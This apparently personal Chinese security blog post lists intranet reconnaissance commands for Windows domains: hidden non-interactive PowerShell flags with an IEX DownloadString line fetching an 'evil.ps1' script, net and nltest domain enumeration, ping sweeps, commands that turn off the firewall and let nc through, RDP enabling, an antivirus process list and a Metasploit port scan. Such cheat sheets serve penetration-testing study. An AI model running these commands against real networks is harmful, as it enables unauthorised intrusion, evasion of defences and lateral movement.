<!doctype html>
<html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>简易内网信息收集 - Resek&#039;s Kingdom</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="Resek&#039;s Kingdom"><meta name="msapplication-TileImage" content="/img/favicon.jpg"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="Resek&#039;s Kingdom"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="内网信息收集辅助命令1234567891011121314151617181920&amp;#x2F;&amp;#x2F; 隐藏窗口-W Hidden-WindowStyle Hidden&amp;#x2F;&amp;#x2F;非交互模式，不为用户提供交互提示-NonI-NonInteractive&amp;#x2F;&amp;#x2F;使用IEX（Invoke-Expression）进行远程脚本下载-IEX(New-ObjectNet.WebClient).DownloadString(&amp;quot;1"><meta property="og:type" content="blog"><meta property="og:title" content="简易内网信息收集"><meta property="og:url" content="https://resek4.github.io/2021/06/11/%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/"><meta property="og:site_name" content="Resek&#039;s Kingdom"><meta property="og:description" content="内网信息收集辅助命令1234567891011121314151617181920&amp;#x2F;&amp;#x2F; 隐藏窗口-W Hidden-WindowStyle Hidden&amp;#x2F;&amp;#x2F;非交互模式，不为用户提供交互提示-NonI-NonInteractive&amp;#x2F;&amp;#x2F;使用IEX（Invoke-Expression）进行远程脚本下载-IEX(New-ObjectNet.WebClient).DownloadString(&amp;quot;1"><meta property="og:locale" content="en_US"><meta property="og:image" content="https://resek4.github.io/img/og_image.png"><meta property="article:published_time" content="2021-06-10T16:00:00.000Z"><meta property="article:modified_time" content="2023-01-27T09:23:53.310Z"><meta property="article:author" content="Resek4"><meta property="twitter:card" content="summary"><meta property="twitter:image" content="/img/og_image.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://resek4.github.io/2021/06/11/%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/"},"headline":"简易内网信息收集","image":["https://resek4.github.io/img/og_image.png"],"datePublished":"2021-06-10T16:00:00.000Z","dateModified":"2023-01-27T09:23:53.310Z","author":{"@type":"Person","name":"Resek4"},"publisher":{"@type":"Organization","name":"Resek's Kingdom","logo":{"@type":"ImageObject","url":"https://resek4.github.io/img/logo.jpg"}},"description":"内网信息收集辅助命令1234567891011121314151617181920&#x2F;&#x2F; 隐藏窗口-W Hidden-WindowStyle Hidden&#x2F;&#x2F;非交互模式，不为用户提供交互提示-NonI-NonInteractive&#x2F;&#x2F;使用IEX（Invoke-Expression）进行远程脚本下载-IEX(New-ObjectNet.WebClient).DownloadString(&quot;1"}</script><link rel="canonical" href="https://resek4.github.io/2021/06/11/%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/"><link rel="alternate" href="https://resek4.github.io/atom.xml" title="Resek&#039;s Kingdom" type="application/atom+xml"><link rel="icon" href="/img/favicon.jpg"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.15.2/css/all.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/xt256.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Oxanium:wght@300;400;600&amp;family=Roboto+Mono"><link rel="stylesheet" href="/css/cyberpunk.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/css/justifiedGallery.min.css"><!--!--><!--!--><style>.pace{-webkit-pointer-events:none;pointer-events:none;-webkit-user-select:none;-moz-user-select:none;user-select:none}.pace-inactive{display:none}.pace .pace-progress{background:#3273dc;position:fixed;z-index:2000;top:0;right:100%;width:100%;height:2px}</style><script src="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/pace.min.js"></script><!--!--><!--!--><meta name="generator" content="Hexo 6.2.0"></head><body class="is-3-column"><nav class="navbar navbar-main"><div class="container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/logo.jpg" alt="Resek&#039;s Kingdom" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">Home</a><a class="navbar-item" href="/archives">Archives</a><a class="navbar-item" href="/categories">Categories</a><a class="navbar-item" href="/tags">Tags</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/Resek4/resek4.github.io"><i class="fab fa-github"></i></a><a class="navbar-item is-hidden-tablet catalogue" title="Catalogue" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="Search" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-6-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item">Posted&nbsp;<time dateTime="2021-06-10T16:00:00.000Z" title="6/11/2021, 12:00:00 AM">2021-06-11</time></span><span class="level-item">Updated&nbsp;<time dateTime="2023-01-27T09:23:53.310Z" title="1/27/2023, 5:23:53 PM">2023-01-27</time></span><span class="level-item"><a class="link-muted" href="/categories/Penetration/">Penetration</a></span><span class="level-item">11 minutes read (About 1608 words)</span></div></div><h1 class="title is-3 is-size-4-mobile">简易内网信息收集</h1><div class="content"><h1 id="内网信息收集"><a href="#内网信息收集" class="headerlink" title="内网信息收集"></a>内网信息收集</h1><h2 id="辅助命令"><a href="#辅助命令" class="headerlink" title="辅助命令"></a>辅助命令</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 隐藏窗口</span></span><br><span class="line">-W Hidden</span><br><span class="line">-WindowStyle Hidden</span><br><span class="line"></span><br><span class="line"><span class="comment">//非交互模式，不为用户提供交互提示</span></span><br><span class="line">-NonI</span><br><span class="line">-NonInteractive</span><br><span class="line"></span><br><span class="line"><span class="comment">//使用IEX（Invoke-Expression）进行远程脚本下载</span></span><br><span class="line">-IEX(New-ObjectNet.WebClient).DownloadString(<span class="string">&quot;127.0.0.1/evil.ps1&quot;</span>) </span><br><span class="line"></span><br><span class="line"><span class="comment">//不加载当前用户的配置文件</span></span><br><span class="line">-NoP</span><br><span class="line">-NoProfile</span><br><span class="line"></span><br><span class="line"><span class="comment">//显示logo的启动</span></span><br><span class="line">-NoLogo</span><br><span class="line"></span><br><span class="line"><span class="comment">//执行后不退出shell，常用于键盘记录等</span></span><br><span class="line">-noexit</span><br></pre></td></tr></table></figure>
<span id="more"></span>

<h2 id="宗旨"><a href="#宗旨" class="headerlink" title="宗旨"></a>宗旨</h2><p>进入内网的“黑暗森林”后，需要有个大致的判断：</p>
<ol>
<li>我是谁（whoami 等）</li>
<li>这个机子都有谁，有[[域]]吗，域的账户都有啥（重点关注 3 本地组管理员与全局组管理员），域控的 ip 域机器名是啥</li>
<li>本机信息收集</li>
<li>我的域有其他存活的机子吗，都开放了什么端口</li>
<li>确定域管理员、本地管理员都有谁，登录本台机器的都有谁（有没有域管理员）</li>
<li>当前域控下的活动域都有哪些</li>
</ol>
<h2 id="杂余命令"><a href="#杂余命令" class="headerlink" title="杂余命令"></a>杂余命令</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//查看当前权限</span></span><br><span class="line">whoami</span><br><span class="line">whoami /all <span class="comment">//可以获取域SID</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//查看完整IP信息</span></span><br><span class="line">ipconfig /all</span><br><span class="line"></span><br><span class="line"><span class="comment">//查看系统信息</span></span><br><span class="line">systeminfo</span><br><span class="line">systeminfo | findstr /b /c:<span class="string">&quot;OS&quot;</span></span><br><span class="line">echo %PROCESSOR_ARCHITECTURE% <span class="comment">//或者%PATH%啥的，反正是环境变量</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//查询端口列表</span></span><br><span class="line">netstat -ano</span><br><span class="line"></span><br><span class="line"><span class="comment">//查看计划任务</span></span><br><span class="line">schtasks /query /fo LIST /v</span><br><span class="line"></span><br><span class="line"><span class="comment">//使用telnet逐一验证高危端口是否开启</span></span><br><span class="line">telnet DC <span class="number">22</span></span><br><span class="line">telnet DC <span class="number">1443</span></span><br><span class="line">telnet <span class="number">1.2</span><span class="number">.3</span><span class="number">.4</span> <span class="number">3389</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//查询路由表</span></span><br><span class="line">route print</span><br><span class="line"></span><br><span class="line"><span class="comment">//查询所有可用接口的ARP缓存表</span></span><br><span class="line">arp -a</span><br><span class="line"></span><br><span class="line"><span class="comment">//查看域控的机器名</span></span><br><span class="line">nltest /DCLIST:hacke</span><br><span class="line"></span><br><span class="line"><span class="comment">//查看域控的主机名</span></span><br><span class="line">nslookup -type=SRV _ldap._tcp</span><br><span class="line"></span><br><span class="line"><span class="comment">//查看代理配置情况</span></span><br><span class="line">reg query <span class="string">&quot;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//查询远程连接端口（0xd3d就是3389）</span></span><br><span class="line">REG QUERY <span class="string">&quot;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP&quot;</span> /V PortNumber</span><br><span class="line"></span><br><span class="line"><span class="comment">//在Windows Server 2003中开启3389</span></span><br><span class="line">wmic path win32_terminalservicesetting where (__CLASS !=<span class="string">&quot;&quot;</span>) call setallowsconnections <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//在Windows Server 2008和Windows Ser ver 2012中开启3389（以下三选一）</span></span><br><span class="line">wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !=<span class="string">&quot;&quot;</span>) call setallowtsconnections <span class="number">1</span></span><br><span class="line"></span><br><span class="line">wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName=<span class="string">&quot;RDP-Tcp&quot;</span>) call setuserauthenticationrequired <span class="number">1</span></span><br><span class="line"></span><br><span class="line">reg add <span class="string">&quot;HKLM\SYSTEM\CURRENT\CONTROLSET\CONTROL\TERMINAL SERVER&quot;</span> /v fSingleSessionPerUser /t REG_DWORD /d <span class="number">0</span> /f</span><br><span class="line"></span><br><span class="line"><span class="comment">//判断当前域控下活动域都有哪些</span></span><br><span class="line"><span class="comment">//将域控机器名放在dcs.txt中，域管理员放到admins.txt中</span></span><br><span class="line">FOR /F %I in (dcs.txt) <span class="keyword">do</span> @echo [+] Querying DC %I &amp;&amp; @netsess -h %I <span class="number">2</span>&gt;nul &gt;sessions.txt &amp;&amp; FOR /F %a in (admins.txt) DO @type sessions.txt | findstr /I %a</span><br><span class="line"></span><br><span class="line"><span class="comment">//通过ping的ICMP协议进行主机探测</span></span><br><span class="line"><span class="keyword">for</span> /L %I in (<span class="number">1</span>,<span class="number">1</span>,<span class="number">254</span>) DO @ping  -w <span class="number">1</span> -n <span class="number">1</span> <span class="number">192.168</span><span class="number">.1</span>.%I | findstr <span class="string">&quot;TTL=&quot;</span></span><br></pre></td></tr></table></figure>

<h2 id="net-命令"><a href="#net-命令" class="headerlink" title="net 命令"></a>net 命令</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//查看域里的各种基本信息</span></span><br><span class="line"><span class="comment">//加domain就是域内操作，会直接将命令放到域控上执行</span></span><br><span class="line">net group /domain</span><br><span class="line">net user /domain</span><br><span class="line">net group <span class="string">&quot;domain admins&quot;</span> /domain <span class="comment">//可以在后面加身份来具体查询</span></span><br><span class="line">net localgroup  <span class="comment">//本地组 </span></span><br><span class="line"></span><br><span class="line"><span class="comment">//在域内机器上net group /domain 等同于在域控上 net group</span></span><br><span class="line"><span class="comment">//如果在本地组里是administrators里边的，及是本地的系统管理员</span></span><br><span class="line"><span class="comment">//如果全局组中是domain users 既是普通域用户，如果在全局组中的domain admins 组里边，那么不光是域管理员还是域内所有机器的管理员（即会自动加入到域内机器的 administrtors 组里边）</span></span><br><span class="line"></span><br><span class="line">身份如下：</span><br><span class="line">Domain Admins <span class="comment">//域管理员（完全控制权限）</span></span><br><span class="line">Domain Computers <span class="comment">//域内机器</span></span><br><span class="line">Domain Controllers <span class="comment">//域控制器</span></span><br><span class="line">Domain Guest <span class="comment">//域访客，权限较低</span></span><br><span class="line">Domain Users <span class="comment">//域用户</span></span><br><span class="line">Enterprise Admins <span class="comment">//企业系统管理员用户（完全控制权限）</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//查看当前计算机信息以及是否在域下面</span></span><br><span class="line">net config workstation</span><br><span class="line"></span><br><span class="line"><span class="comment">//查看域控服务器</span></span><br><span class="line">net time /domain</span><br><span class="line"></span><br><span class="line"><span class="comment">//查看域密码策略信息</span></span><br><span class="line">net accounts /domain</span><br><span class="line"></span><br><span class="line"><span class="comment">//查询域</span></span><br><span class="line">net view</span><br><span class="line"></span><br><span class="line"><span class="comment">//查询域内所有计算机</span></span><br><span class="line"><span class="comment">//dev有可能是开发服务器，web、app有可能是Web服务器，NAS可能是存储服务器，fileserver可能是文件服务器</span></span><br><span class="line">net view /domain:HACKE</span><br><span class="line"></span><br><span class="line"><span class="comment">//查看主机开机时间</span></span><br><span class="line">net statistics workstation</span><br><span class="line"></span><br><span class="line"><span class="comment">//列出或断开本地计算机与所连接客户端的对话</span></span><br><span class="line">net session</span><br><span class="line"></span><br><span class="line"><span class="comment">//查询本机共享列表</span></span><br><span class="line">net share</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="netsh-防火墙相关"><a href="#netsh-防火墙相关" class="headerlink" title="netsh-防火墙相关"></a>netsh-防火墙相关</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//关闭防火墙</span></span><br><span class="line">netsh firewall <span class="built_in">set</span> opmode disable <span class="comment">//Windows Server 2003之前版本</span></span><br><span class="line">netsh advfirewall <span class="built_in">set</span> allprofiles state off <span class="comment">//Windows Server 2003之后版本</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//查看防火墙配置</span></span><br><span class="line">netsh firewall show config</span><br><span class="line"></span><br><span class="line"><span class="comment">//允许指定程序进入（Windows Server 2003之前版本）</span></span><br><span class="line">netsh firewall add allowedprogram c:\nc.exe <span class="string">&quot;allow nc&quot;</span> enable </span><br><span class="line"></span><br><span class="line"><span class="comment">//允许指定程序进入</span></span><br><span class="line">netsh advfirewall firewall add rule name=<span class="string">&quot;pass nc&quot;</span> dir=in action=allow </span><br><span class="line"></span><br><span class="line"><span class="comment">//允许指定程序退出</span></span><br><span class="line">netsh advfirewall firewall add rule name=<span class="string">&quot;Allow nc&quot;</span> dir=out action=allow</span><br><span class="line"></span><br><span class="line"><span class="comment">//允许某端口放行</span></span><br><span class="line">netsh advfirewall firewall add rule name=<span class="string">&quot;Remote Desktop&quot;</span> protocol=TCP dir=in localport=<span class="number">3389</span> action=allow</span><br><span class="line"></span><br><span class="line"><span class="comment">//自定义防火墙日志的存储位置</span></span><br><span class="line">netsh advfirewall <span class="built_in">set</span> currentprofile logging filename <span class="string">&quot;C:\windows\&quot;</span></span><br></pre></td></tr></table></figure>

<h2 id="wmic"><a href="#wmic" class="headerlink" title="wmic"></a>wmic</h2><ul>
<li><p>参考： <a target="_blank" rel="noopener" href="https://www.cnblogs.com/lsgxeva/p/8283662.html">Windows WMIC 命令使用详解(附实例)</a></p>
</li>
<li><p>集合命令集参考 <a target="_blank" rel="noopener" href="http://www.fuzzysecurity.com/scripts/files/wmic_info.rar">wmic_info</a></p>
</li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//获取安装的软件、版本信息</span></span><br><span class="line">wmic product get name,version</span><br><span class="line"></span><br><span class="line"><span class="comment">//查询本机的服务信息</span></span><br><span class="line">wmic service <span class="built_in">list</span> brief</span><br><span class="line"></span><br><span class="line"><span class="comment">//查看启动程序的信息</span></span><br><span class="line">wmic startup get command,caption</span><br><span class="line"></span><br><span class="line"><span class="comment">//查看安装在系统中的补丁</span></span><br><span class="line">wmic qfe get Caption,Description,HotFixID,InstalledOn</span><br><span class="line"></span><br><span class="line"><span class="comment">//查询本机共享列表</span></span><br><span class="line">wmic share get name,path,status</span><br><span class="line"></span><br><span class="line"><span class="comment">//查看域内用户详细信息</span></span><br><span class="line">wmic useraccount get /all</span><br></pre></td></tr></table></figure>

<h2 id="ds-命令"><a href="#ds-命令" class="headerlink" title="ds 命令"></a>ds 命令</h2><p>ds 命令只能在 windows 服务器版本下才能运行</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//查看存在的用户</span></span><br><span class="line">dsquery user</span><br></pre></td></tr></table></figure>

<h2 id="tasklist"><a href="#tasklist" class="headerlink" title="tasklist"></a>tasklist</h2><ul>
<li>常见杀毒软件进程名称</li>
</ul>
<table>
<thead>
<tr>
<th align="center">进程名</th>
<th align="center">软件名</th>
</tr>
</thead>
<tbody><tr>
<td align="center">360sd.exe</td>
<td align="center">360 杀毒</td>
</tr>
<tr>
<td align="center">360tray.exe</td>
<td align="center">360 实时防护</td>
</tr>
<tr>
<td align="center">ZhuDongFangYu.exe</td>
<td align="center">360 主动防御</td>
</tr>
<tr>
<td align="center">KSafeTray.exe</td>
<td align="center">金山卫士</td>
</tr>
<tr>
<td align="center">SafeDogUpdateCenter.exe</td>
<td align="center">服务器安全狗</td>
</tr>
<tr>
<td align="center">McAfee McShield.exe</td>
<td align="center">McAfee</td>
</tr>
<tr>
<td align="center">egui.exe</td>
<td align="center">NOD32</td>
</tr>
<tr>
<td align="center">AVP.EXE</td>
<td align="center">卡巴斯基</td>
</tr>
<tr>
<td align="center">avguard.exe</td>
<td align="center">小红伞</td>
</tr>
<tr>
<td align="center">bdagent.exe</td>
<td align="center">BitDefender</td>
</tr>
</tbody></table>
<h2 id="adfind-exe"><a href="#adfind-exe" class="headerlink" title="adfind.exe"></a>adfind.exe</h2><p>使用 adfind.exe</p>
<ul>
<li>下载链接： <a target="_blank" rel="noopener" href="https://www.softpedia.com/get/Programming/Other-Programming-Files/AdFind.shtml">Adfind</a></li>
</ul>
<h2 id="nbtscan-exe"><a href="#nbtscan-exe" class="headerlink" title="nbtscan.exe"></a>nbtscan.exe</h2><p>使用 nbtscan.exe 进行域内存活主机的探测</p>
<ul>
<li>下载链接： <a target="_blank" rel="noopener" href="http://www.unixwiz.net/tools/nbtscan.html">nbtscan</a></li>
</ul>
<p>行末的提示对照表</p>
<table>
<thead>
<tr>
<th align="center">Token</th>
<th align="center">含义</th>
</tr>
</thead>
<tbody><tr>
<td align="center">SHARING</td>
<td align="center">该机器中存在正在运行的文件和打印共享服务，但不一定有内容共享</td>
</tr>
<tr>
<td align="center">DC</td>
<td align="center">该机器可能是域控制器</td>
</tr>
<tr>
<td align="center">U&#x3D;USER</td>
<td align="center">该机器中有登录名为 User 的用户</td>
</tr>
<tr>
<td align="center">IIS</td>
<td align="center">该机器可能安装了 IIS 服务器</td>
</tr>
<tr>
<td align="center">EXCHANGE</td>
<td align="center">该机器可能安装了 Exchange</td>
</tr>
<tr>
<td align="center">NOTES</td>
<td align="center">该机器可能安装了 Lotus Notes 电子邮件客户端</td>
</tr>
<tr>
<td align="center">?</td>
<td align="center">没有识别出该机器的 NetBIOS 资源（可以使用-F 选项再次扫描）</td>
</tr>
</tbody></table>
<h2 id="Metasploit"><a href="#Metasploit" class="headerlink" title="[[Metasploit]]"></a>[[Metasploit]]</h2><h3 id="使用-TCP-模块进行端口扫描"><a href="#使用-TCP-模块进行端口扫描" class="headerlink" title="使用 TCP 模块进行端口扫描"></a>使用 TCP 模块进行端口扫描</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">search portscan</span><br><span class="line">use auxiliary/scanner/portscan/tcp <span class="comment">//或者使用其他端口扫描软件</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">set</span> RHOSTS <span class="number">1.2</span><span class="number">.3</span><span class="number">.4</span></span><br><span class="line"><span class="built_in">set</span> ports <span class="number">1</span><span class="number">-4000</span></span><br><span class="line"><span class="built_in">set</span> THREADS <span class="number">10</span></span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<h2 id="powershell-框架"><a href="#powershell-框架" class="headerlink" title="[[powershell]]框架"></a>[[powershell]]框架</h2><ul>
<li><p>nishang</p>
</li>
<li><p>powersploit</p>
</li>
</ul>
</div><div class="article-licensing box"><div class="licensing-title"><p>简易内网信息收集</p><p><a href="https://resek4.github.io/2021/06/11/内网信息收集/">https://resek4.github.io/2021/06/11/内网信息收集/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>Author</h6><p>Resek4</p></div></div><div class="level-item is-narrow"><div><h6>Posted on</h6><p>2021-06-11</p></div></div><div class="level-item is-narrow"><div><h6>Updated on</h6><p>2023-01-27</p></div></div><div class="level-item is-narrow"><div><h6>Licensed under</h6><p><a class="icons" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="icon fab fa-creative-commons"></i></a><a class="icons" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="icon fab fa-creative-commons-by"></i></a><a class="icons" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="icon fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="addthis_inline_share_toolbox"></div><script src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-604b3726d8c18ac5" defer></script></article></div><!--!--><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2021/07/03/%E5%AE%89%E5%85%A8%E5%8A%A0%E5%9B%BA/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">简述 Windows 及 Linux 平台服务的安全加固</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2021/05/12/Windows%E5%90%8E%E9%97%A8%E5%8F%8A%E6%8E%92%E6%9F%A5/"><span class="level-item">Windows 关键文件安全性排查(红蓝对抗)</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><div class="card"><div class="card-content"><h3 class="title is-5">Comments</h3><script src="https://utteranc.es/client.js" repo="Resek4/resek4.github.io" issue-term="pathname" theme="dark-blue" crossorigin="anonymous" async></script></div></div></div><div class="column column-left is-4-tablet is-4-desktop is-3-widescreen  order-1"><div class="card widget" data-type="profile"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar" src="/img/avatar.jpg" alt="Resek4"></figure><p class="title is-size-4 is-block" style="line-height:inherit;">Resek4</p><p class="is-size-6 is-block">对黑客创意上下求索</p><p class="is-size-6 is-flex justify-content-center"><i class="fas fa-map-marker-alt mr-1"></i><span>NightCity</span></p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">Posts</p><a href="/archives"><p class="title">31</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Categories</p><a href="/categories"><p class="title">4</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Tags</p><a href="/tags"><p class="title">0</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://github.com/Resek4" target="_blank" rel="noopener">Follow</a></div><div class="level is-mobile is-multiline"><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Github" href="https://github.com/Resek4"><i class="fab fa-github"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Twitter" href="https://twitter.com/Resek_4"><i class="fab fa-twitter"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="RSS" href="https://resek4.github.io/atom.xml"><i class="fas fa-rss"></i></a></div></div></div><div class="card widget" data-type="archives"><div class="card-content"><div class="menu"><h3 class="menu-label">Archives</h3><ul class="menu-list"><li><a class="level is-mobile" href="/archives/2023/03/"><span class="level-start"><span class="level-item">March 2023</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2023/01/"><span class="level-start"><span class="level-item">January 2023</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2022/12/"><span class="level-start"><span class="level-item">December 2022</span></span><span class="level-end"><span class="level-item tag">3</span></span></a></li><li><a class="level is-mobile" href="/archives/2022/10/"><span class="level-start"><span class="level-item">October 2022</span></span><span class="level-end"><span class="level-item tag">3</span></span></a></li><li><a class="level is-mobile" href="/archives/2022/08/"><span class="level-start"><span class="level-item">August 2022</span></span><span class="level-end"><span class="level-item tag">3</span></span></a></li><li><a class="level is-mobile" href="/archives/2022/07/"><span class="level-start"><span class="level-item">July 2022</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2022/06/"><span class="level-start"><span class="level-item">June 2022</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2022/02/"><span class="level-start"><span class="level-item">February 2022</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li><li><a class="level is-mobile" href="/archives/2021/07/"><span class="level-start"><span class="level-item">July 2021</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2021/06/"><span class="level-start"><span class="level-item">June 2021</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" 